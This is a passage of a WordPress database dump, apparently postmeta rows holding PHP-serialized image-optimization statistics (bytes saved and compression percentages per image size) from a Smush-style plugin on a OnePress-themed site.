:1362;s:11:\"size_before\";i:7533;s:10:\"size_after\";i:6171;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:6458;s:11:\"size_before\";i:27111;s:10:\"size_after\";i:20653;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:721;s:11:\"size_before\";i:5651;s:10:\"size_after\";i:4930;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2048;s:11:\"size_before\";i:12467;s:10:\"size_after\";i:10419;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3154;s:11:\"size_before\";i:18876;s:10:\"size_after\";i:15722;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4130,2489,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.8342043599150148480703137465752661228179931640625;s:5:\"bytes\";i:15859;s:11:\"size_before\";i:146379;s:10:\"size_after\";i:130520;s:4:\"time\";d:0.16000000000000003108624468950438313186168670654296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.71999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:322;s:11:\"size_before\";i:4173;s:10:\"size_after\";i:3851;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:800;s:11:\"size_before\";i:9802;s:10:\"size_after\";i:9002;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4079;s:11:\"size_before\";i:35773;s:10:\"size_after\";i:31694;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.25;s:5:\"bytes\";i:7369;s:11:\"size_before\";i:55634;s:10:\"size_after\";i:48265;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.79000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:460;s:11:\"size_before\";i:6773;s:10:\"size_after\";i:6313;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1083;s:11:\"size_before\";i:13798;s:10:\"size_after\";i:12715;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1746;s:11:\"size_before\";i:20426;s:10:\"size_after\";i:18680;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4131,2488,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.5083652117804309256143824313767254352569580078125;s:5:\"bytes\";i:4560;s:11:\"size_before\";i:43394;s:10:\"size_after\";i:38834;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:328;s:11:\"size_before\";i:3389;s:10:\"size_after\";i:3061;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:796;s:11:\"size_before\";i:7687;s:10:\"size_after\";i:6891;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:473;s:11:\"size_before\";i:5745;s:10:\"size_after\";i:5272;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1184;s:11:\"size_before\";i:11670;s:10:\"size_after\";i:10486;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:1779;s:11:\"size_before\";i:14903;s:10:\"size_after\";i:13124;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4132,2487,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.565217391304347671621144399978220462799072265625;s:5:\"bytes\";i:5082;s:11:\"size_before\";i:53130;s:10:\"size_after\";i:48048;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:401;s:11:\"size_before\";i:4209;s:10:\"size_after\";i:3808;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:932;s:11:\"size_before\";i:9188;s:10:\"size_after\";i:8256;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.88999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:578;s:11:\"size_before\";i:7330;s:10:\"size_after\";i:6752;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1263;s:11:\"size_before\";i:14488;s:10:\"size_after\";i:13225;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1908;s:11:\"size_before\";i:17915;s:10:\"size_after\";i:16007;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4133,2486,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.534216377491876670546844252385199069976806640625;s:5:\"bytes\";i:5017;s:11:\"size_before\";i:52621;s:10:\"size_after\";i:47604;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:363;s:11:\"size_before\";i:3653;s:10:\"size_after\";i:3290;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:940;s:11:\"size_before\";i:8608;s:10:\"size_after\";i:7668;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:600;s:11:\"size_before\";i:7681;s:10:\"size_after\";i:7081;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:1215;s:11:\"size_before\";i:14838;s:10:\"size_after\";i:13623;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1899;s:11:\"size_before\";i:17841;s:10:\"size_after\";i:15942;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4134,2484,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.082804946952098390511309844441711902618408203125;s:5:\"bytes\";i:8973;s:11:\"size_before\";i:63716;s:10:\"size_after\";i:54743;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:628;s:11:\"size_before\";i:5570;s:10:\"size_after\";i:4942;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1216;s:11:\"size_before\";i:9223;s:10:\"size_after\";i:8007;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:896;s:11:\"size_before\";i:6944;s:10:\"size_after\";i:6048;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2401;s:11:\"size_before\";i:17477;s:10:\"size_after\";i:15076;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:3832;s:11:\"size_before\";i:24502;s:10:\"size_after\";i:20670;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4135,2483,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.130115304799556241732716443948447704315185546875;s:5:\"bytes\";i:74787;s:11:\"size_before\";i:436582;s:10:\"size_after\";i:361795;s:4:\"time\";d:0.91000000000000003108624468950438313186168670654296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:3654;s:11:\"size_before\";i:21318;s:10:\"size_after\";i:17664;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:8891;s:11:\"size_before\";i:51165;s:10:\"size_after\";i:42274;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:8531;s:11:\"size_before\";i:46094;s:10:\"size_after\";i:37563;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:19694;s:11:\"size_before\";i:114562;s:10:\"size_after\";i:94868;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:34017;s:11:\"size_before\";i:203443;s:10:\"size_after\";i:169426;s:4:\"time\";d:0.4899999999999999911182158029987476766109466552734375;}}}'),(4136,2482,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.042268576776006483441960881464183330535888671875;s:5:\"bytes\";i:90875;s:11:\"size_before\";i:533233;s:10:\"size_after\";i:442358;s:4:\"time\";d:0.9199999999999999289457264239899814128875732421875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:5184;s:11:\"size_before\";i:25365;s:10:\"size_after\";i:20181;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.469999999999998863131622783839702606201171875;s:5:\"bytes\";i:11620;s:11:\"size_before\";i:62908;s:10:\"size_after\";i:51288;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:11480;s:11:\"size_before\";i:55699;s:10:\"size_after\";i:44219;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:22542;s:11:\"size_before\";i:140084;s:10:\"size_after\";i:117542;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:40049;s:11:\"size_before\";i:249177;s:10:\"size_after\";i:209128;s:4:\"time\";d:0.4899999999999999911182158029987476766109466552734375;}}}'),(4137,2481,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.374197272530484070784950745292007923126220703125;s:5:\"bytes\";i:45386;s:11:\"size_before\";i:277180;s:10:\"size_after\";i:231794;s:4:\"time\";d:0.85999999999999998667732370449812151491641998291015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1624;s:11:\"size_before\";i:9543;s:10:\"size_after\";i:7919;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:5218;s:11:\"size_before\";i:32297;s:10:\"size_after\";i:27079;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4869;s:11:\"size_before\";i:27667;s:10:\"size_after\";i:22798;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:9986;s:11:\"size_before\";i:70688;s:10:\"size_after\";i:60702;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:23689;s:11:\"size_before\";i:136985;s:10:\"size_after\";i:113296;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;}}}'),(4138,2480,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.475877832184124827108462341129779815673828125;s:5:\"bytes\";i:217488;s:11:\"size_before\";i:888581;s:10:\"size_after\";i:671093;s:4:\"time\";d:1.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:2911;s:11:\"size_before\";i:18930;s:10:\"size_after\";i:16019;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.309999999999998721023075631819665431976318359375;s:5:\"bytes\";i:8499;s:11:\"size_before\";i:52119;s:10:\"size_after\";i:43620;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:33509;s:11:\"size_before\";i:227963;s:10:\"size_after\";i:194454;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:46.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:122773;s:11:\"size_before\";i:263057;s:10:\"size_after\";i:140284;s:4:\"time\";d:0.35999999999999998667732370449812151491641998291015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:6938;s:11:\"size_before\";i:44498;s:10:\"size_after\";i:37560;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:17281;s:11:\"size_before\";i:109135;s:10:\"size_after\";i:91854;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:25577;s:11:\"size_before\";i:172879;s:10:\"size_after\";i:147302;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4139,2479,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.184613724643934773439468699507415294647216796875;s:5:\"bytes\";i:85950;s:11:\"size_before\";i:370720;s:10:\"size_after\";i:284770;s:4:\"time\";d:1.439999999999999946709294817992486059665679931640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:2486;s:11:\"size_before\";i:16075;s:10:\"size_after\";i:13589;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:10152;s:11:\"size_before\";i:51509;s:10:\"size_after\";i:41357;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:7058;s:11:\"size_before\";i:32680;s:10:\"size_after\";i:25622;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:23518;s:11:\"size_before\";i:98575;s:10:\"size_after\";i:75057;s:4:\"time\";d:0.5;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:42736;s:11:\"size_before\";i:171881;s:10:\"size_after\";i:129145;s:4:\"time\";d:0.560000000000000053290705182007513940334320068359375;}}}'),(4140,2478,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:32.36001673869196082478083553723990917205810546875;s:5:\"bytes\";i:163166;s:11:\"size_before\";i:504221;s:10:\"size_after\";i:341055;s:4:\"time\";d:1.3300000000000000710542735760100185871124267578125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4465;s:11:\"size_before\";i:14960;s:10:\"size_after\";i:10495;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:11114;s:11:\"size_before\";i:39454;s:10:\"size_after\";i:28340;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.809999999999998721023075631819665431976318359375;s:5:\"bytes\";i:35044;s:11:\"size_before\";i:126016;s:10:\"size_after\";i:90972;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:45.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:50594;s:11:\"size_before\";i:111305;s:10:\"size_after\";i:60711;s:4:\"time\";d:0.450000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.64999999999999857891452847979962825775146484375;s:5:\"bytes\";i:10417;s:11:\"size_before\";i:36359;s:10:\"size_after\";i:25942;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:22306;s:11:\"size_before\";i:74125;s:10:\"size_after\";i:51819;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.64999999999999857891452847979962825775146484375;s:5:\"bytes\";i:29226;s:11:\"size_before\";i:102002;s:10:\"size_after\";i:72776;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4141,2477,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.951763637710218546317264554090797901153564453125;s:5:\"bytes\";i:54508;s:11:\"size_before\";i:364559;s:10:\"size_after\";i:310051;s:4:\"time\";d:0.7399999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2607;s:11:\"size_before\";i:14566;s:10:\"size_after\";i:11959;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:6596;s:11:\"size_before\";i:43829;s:10:\"size_after\";i:37233;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.3299999999999982946974341757595539093017578125;s:5:\"bytes\";i:6351;s:11:\"size_before\";i:36644;s:10:\"size_after\";i:30293;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:10439;s:11:\"size_before\";i:89811;s:10:\"size_after\";i:79372;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:28515;s:11:\"size_before\";i:179709;s:10:\"size_after\";i:151194;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}}}'),(4142,2476,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.730773522792791396796019398607313632965087890625;s:5:\"bytes\";i:59061;s:11:\"size_before\";i:430136;s:10:\"size_after\";i:371075;s:4:\"time\";d:1.12999999999999989341858963598497211933135986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:3470;s:11:\"size_before\";i:21875;s:10:\"size_after\";i:18405;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:7912;s:11:\"size_before\";i:51159;s:10:\"size_after\";i:43247;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:6719;s:11:\"size_before\";i:42352;s:10:\"size_after\";i:35633;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:14897;s:11:\"size_before\";i:112618;s:10:\"size_after\";i:97721;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:26063;s:11:\"size_before\";i:202132;s:10:\"size_after\";i:176069;s:4:\"time\";d:0.58999999999999996891375531049561686813831329345703125;}}}'),(4143,2475,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.31131589743307586104492656886577606201171875;s:5:\"bytes\";i:84666;s:11:\"size_before\";i:363197;s:10:\"size_after\";i:278531;s:4:\"time\";d:1.0700000000000000621724893790087662637233734130859375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.530000000000001136868377216160297393798828125;s:5:\"bytes\";i:3348;s:11:\"size_before\";i:17141;s:10:\"size_after\";i:13793;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:9636;s:11:\"size_before\";i:42794;s:10:\"size_after\";i:33158;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:9786;s:11:\"size_before\";i:35081;s:10:\"size_after\";i:25295;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:17955;s:11:\"size_before\";i:88427;s:10:\"size_after\";i:70472;s:4:\"time\";d:0.25;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:43941;s:11:\"size_before\";i:179754;s:10:\"size_after\";i:135813;s:4:\"time\";d:0.59999999999999997779553950749686919152736663818359375;}}}'),(4144,2474,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.595692815867778335814364254474639892578125;s:5:\"bytes\";i:123904;s:11:\"size_before\";i:503763;s:10:\"size_after\";i:379859;s:4:\"time\";d:1.270000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:3016;s:11:\"size_before\";i:14955;s:10:\"size_after\";i:11939;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:8904;s:11:\"size_before\";i:44120;s:10:\"size_after\";i:35216;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:12:\"medium_large\";O:8:\"stdClass\